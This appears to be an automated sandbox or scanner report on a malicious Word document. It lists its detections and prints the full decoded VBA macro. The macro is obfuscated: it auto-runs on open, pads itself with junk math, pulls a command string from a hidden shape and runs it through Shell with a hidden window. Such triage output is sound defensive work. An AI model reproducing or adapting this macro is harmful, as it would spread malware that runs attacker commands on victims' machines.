Verdict: MALICIOUS
Risk Score: 252
Heuristics: 9
- ClamAV: Doc.Malware.Dldk-6779509-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Dldk-6779509-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script:
  `. _ Shell(BRJHdVszWK, Hzzlf), XHwpzz) BpalQrunaTWPPVkkTBU = zwUbGETYosEJFQScTDCvV / Tan(21368221) * 321445355 / Tan(204566887) + hLQSaBSBmaDVwfLXVz - Cos(226776144) + (93905917 / Int(KzDIQQzYOwBoEYtD))`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script:
  `Attribute VB_Customizable = True Sub autoopen() rWbjX`
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts: 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6211 bytes |

SHA-256: 4a5a2e02c7f061f7dcc4d64e8cad71f9c6244a410d3078e21fbb48a70f66ac15

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 170 of 203 identifiers look randomly generated (e.g. 'wIwpBoQodjLibosUXWctzqlE'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "qAWkdPEATDC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
rWbjX
End Sub
Attribute VB_Name = "satIYcI"
Function rWbjX()
On Error Resume Next
jTjcUJtazXZSlkBsUDnqOj = vpKFjtFLCPLshlUbt / Tan(1645687) * 232917432 / Tan(107415611) + jHKjjcNVnQZzCnnKDJ - Cos(217100111) + (289368539 / Int(XDarUHzctqiTtPiz))
Set DQrqOwlsizhRqqCYKJ = krMVOttaujJYEK
FQzVIEowpJSKDzcviFiPd = vdwUXqMVZcGHlmYpAzvsWMv
cGdtNcOjNwbTtm = KIkZLYdmtsrZUdsLWiSGbk / Tan(243731859) * 233296862 / Tan(318026812) + OsFijdiOFEiXvdwT - Cos(236613788) + (7023059 / Int(CuDVkEpbjNaXAdwKlj))
Set JOvFXoczjpHHAjNt = KXViuCwBfjitwSNnY
HHojhHFFlYFZnnjjzNLjPLz = rHuFnWtUbsFldi
jQJbtpPAYVAuJHzNMLzbdjA = naCKNFuMktPfXW / Tan(63985922) * 212485165 / Tan(54599142) + kGucziSmiMGSPzPIoTmFnTao - Cos(67878815) + (107582337 / Int(SppCQTfzuFKaYsbWiGRdPPP))
Set qtCKQfGSjmAwtKpzjAVCd = NNLzrhsmcCaHLXQViOzsqms
cYRSuPuMEzfpwToYZzJz = lwRjNRGDlBbUjUTQZr
jWMCbjXEOdcdIviqNfQufN = zbauiczpipwrMXJb / Tan(43128165) * 225063873 / Tan(28516249) + uIOQXadwwpwGVLMaAmtbR - Cos(263999196) + (302345811 / Int(MEVTEEJMaiQrNKWDzAqstp))
Set BKjbUocSGOaDTEJsuj = fqvUNpPpcQzAuWiUIVcpX
MJcmGDzpIvMKJfGpWlFzACIN = hlkBXSqLhilsaiLpmHCo
mAGVcHbIrRNKaRoU = vjBXBapzYHvvLWtSEGWduiji / Tan(259255833) * 200532720 / Tan(304361500) + ZmBGtmuHjmlZQVEAjMjvUsWK - Cos(116413860) + (285653223 / Int(QzSjXjqZlFoCYb))
Set lRVwMYaiCawzihQroBiiJ = COtavSurKHTiGEoU
fqOQIYhMsVOAAqzbXPHD = cIoLQqfvaLCTWCnuwtpLOD
BHKwmmTJfiLZKUOZVdWRkkJ = daoqiAnDMjTLhbnYpKcuzOj / Tan(12198003) * 45948888 / Tan(188847281) + WjDIRzTTLwcfiqH - Cos(89215492) + (201002780 / Int(DsuqzbZIOrOumj))
Set rRUJXCNNHbaNfz = rABBDkOjlbjIjb
QMsdmZmEHzpimO = OuKJAOskfRdkjintimC
qKQVFkSnFFOESSohG = IpYbquGfznFvuX / Tan(184927117) * 279385322 / Tan(62286553) + iTBwRnClobJBTQTUTDsPUWO - Cos(171702644) + (244819348 / Int(hKKrccIuDmBKYlYEFiWz))
Set obZDYzuZHEbNmFsbwz = sZNjTJfHqQQkDnLsikoEi
UvhazmfjdJfoEubvG = tqDJrUXZaMJqHvCiFSwtMtc
Set UCKfFw = qAWkdPEATDC.Shapes(DOGcSNMpz + "AAaSQvKwN" + bqYbMLJ).TextFrame
kLBSJiiqrilkQjAtXmlRoi = MIRiTwzLqaaLQhIkzphv / Tan(264063485) * 35226021 / Tan(239865230) + zFBTLAIzFjoJsvKttT - Cos(306249342) + (62967843 / Int(VjLOBocGjoHYzjOuizqSaG))
Set twsBinBUKadiVqFJLftV = hluMwzPTDrOOCSPJnzSiTwz
FtEYpfmhkmMNzpiolB = jPPSYpAYhanakna
ZtvAIVhzVIGhXQXlBwn = rXiNzJDRDAwJinNsMptUTaE / Tan(285553491) * 322835008 / Tan(218693734) + wjjvwHmhBLhDwSQwUJ - Cos(323646144) + (17332423 / Int(CiYMFTaQSqQPoElWFzCrG))
Set hfluCDikhzilwCHi = oMRiUQnKNfZPKvLdrztaLQW
iJQlDIiPWGOiocMOwjoYEU = ETHEFOIhXpfzLzCHFw
BRJHdVszWK = UCKfFw.ContainingRange + qdYEjiQF + wPiwS + Eqafip + HzLbZ + IuZWQcPI + SnoaS + AZhFic + ftuXiii + jkBuHj
odnIwOPkzwKiOLqtjlPDp = TNPkbfqWkEGANVuDtFLC / Tan(186711538) * 287489875 / Tan(227285076) + pjUIOMjVuLKatOn - Cos(236493848) + (304568378 / Int(MGcOzVwdrKrnBbiJusL))
Set HXUkGCKUJfRbIAfccblzK = UZiHJjvkUvYNTolrIvKiT
sPiAwCjSGLWWCuGw = bZZLWDvjqqkTpojRIhPcJms
EZWKbmrTMDnRIhjZAOY = zwLTbwiARYjDJnbsRujInE / Tan(21435802) * 303765607 / Tan(109946367) + EcENroWTbHOCiiDqB - Cos(262302801) + (131442789 / Int(IUGqHFiQBvtRDNsGvEjuh))
Set LTiPLEEwCPajGjVOFmKFRj = zzVmzuzHZCSInLstZ
FtdrWGIkhwukbYfE = PpSGBEHAdoahCNsktMnkF
KqENCcZjBWDAQotKA = zcZwfQubtrkKLCE / Tan(175588282) * 23922457 / Tan(319520975) + nIbcimPKOKODRoshdoNLnS - Cos(176546634) + (227621999 / Int(wqKAvpkzYNzXzvKPGjQfn))
Set WTValpkwUhtufwEJS = dGtbuJitDvhlJDujTr
UEvMZsQiFQOLwNwBhZuY = wsmoRjXpAzcNdwQi
jrrfhCvrzTjhVOU = tTQnirLPFzFBzBXEjN / Tan(307368801) * 169856491 / Tan(184694841) + zJrpTfMzIKabcalMisjcah - Cos(322792420) + (300331072 / Int(wviwHTuuFVHwpXfCIqubWYz))
Set WjCtzOPMzwUjhzBqj = XEiPoUAZRrCSWawLbYRA
rGvwsCvVIpDupBsoGuhtawX = fZulVYcZfmjziRwS
FwMsduNYjmpiIXFHzhdNu = XjIknszIdncaHYPNunVYU / Tan(39277260) * 338146743 / Tan(70111039) + mCZfPQZpVbfktGVa - Cos(154891782) + (60885683 / Int(BiPjsmnqrWQRhz))
Set BpYdNWDkmzjdAjAzwww = iWWjtcaiSFJwmVF
CuvjwzdjIImJqZTUkotf = rjlvVSjnkrfaUuCBQK
BXpzssdumUuYXrn = ikBMwpiRPinBodtHzP / Tan(55028775) * 69881031 / Tan(187521) + rLWFXSKDzPXhOFf - Cos(136650557) + (68906781 / Int(tYkJFbGJanYIjdWY))
Set qprSLGMiXiGPnciEwRbVhGv = OrXiqjuLpMpiTthRYbhzztnK
DmLuDLjurETihsqjvZbnzlC = KzGYzAUENjntjQlBFjbpN
Const Hzzlf = 0
plrzhoHSTdJzoDDrvOGKW = zpjqNWtViKkRtjGiswlisMhi / Tan(292799325) * 30989040 / Tan(39919765) + mzHbNsmBOrblYwwzOX - Cos(62181178) + (150893144 / Int(NWIYnEmIAwIQZjfDJEAtE))
Set BWAKuOhUVvjjZdwCZo = tOtSUzOSwFSIdftVlYdKYafc
hpKCEGfMuLEHEfLf = lODmFEfINivdaSjQFnJDQsz
pjPhpwFYoWALiGAsdhLUiDJ = YtEwJiziEBnLPwZbS / Tan(330919069) * 245062216 / Tan(92061377) + bFpRViwVGLlXzJvrH - Cos(103633009) + (65282440 / Int(WGhSpcfIkCjSvBwoOhn))
Set wIwpBoQodjLibosUXWctzqlE = TczNHdZcJaNIsRALqiAr
qGJbQrFtAIXuJiMSbVFlGROi = fFbhILkMhcWolrlU
viBERRJikDjrvwsBbvpcrY = WfJXaSjAYdwoONPdJaZiaAq / Tan(339256610) * 334085427 / Tan(41559071) + wTEzwXkfZItiMECHO - Cos(325654924) + (54864706 / Int(nMRfBSpTVpJYUAhhUdBQ))
Set ipVPsMiXsbCqbdmBYzdh = JkwVNLWVnkvrAFWvP
GLvcNHisWvjvjYiL = FXuiAICFqGwaYPFJnXW
aUWiAQCzvCIjEBqwJ = GlWPDzTjiEHrqOfHJUYzmM / Tan(312488327) * 326549504 / Tan(227380901) + iwHWhYsjvatLRXOTm - Cos(332171478) + (291689315 / Int(LuEzsVaKCtpYjn))
Set XYIWjzHSENzDBkSaz = fDorKdLzijCkVid
rvibJDEbzkuSZZk = sTBjbfOiLlRbQTsSZu
oXSlOzwcKuDYpTHiDLRifUTw = NaLamfBjNpskjfJ / Tan(286497937) * 139952238 / Tan(35242572) + TOjrzOSThZTTDWiBWmBXOBs - Cos(184330226) + (197850957 / Int(tUfInKPZcshiMMTLU))
Set uVoNFimFThfRWEN = UwoYmIEiulUoapDDhlhIa
OBWhriuKWdUbsVXvUlRK = TJzfidbkkWFJojnCER
SpOii = Array(sPJvGrZr, QkmdMrw, hcGpipdU, Interaction _
. _
Shell(BRJHdVszWK, Hzzlf), XHwpzz)
BpalQrunaTWPPVkkTBU = zwUbGETYosEJFQScTDCvV / Tan(21368221) * 321445355 / Tan(204566887) + hLQSaBSBmaDVwfLXVz - Cos(226776144) + (93905917 / Int(KzDIQQzYOwBoEYtD))
Set NqmHSqPHUYrYzDO = KXMNKKlTdXdBjuGSU
mrcErJnAvrIzOsnYt = jpvDFSivMOaaSY
End Function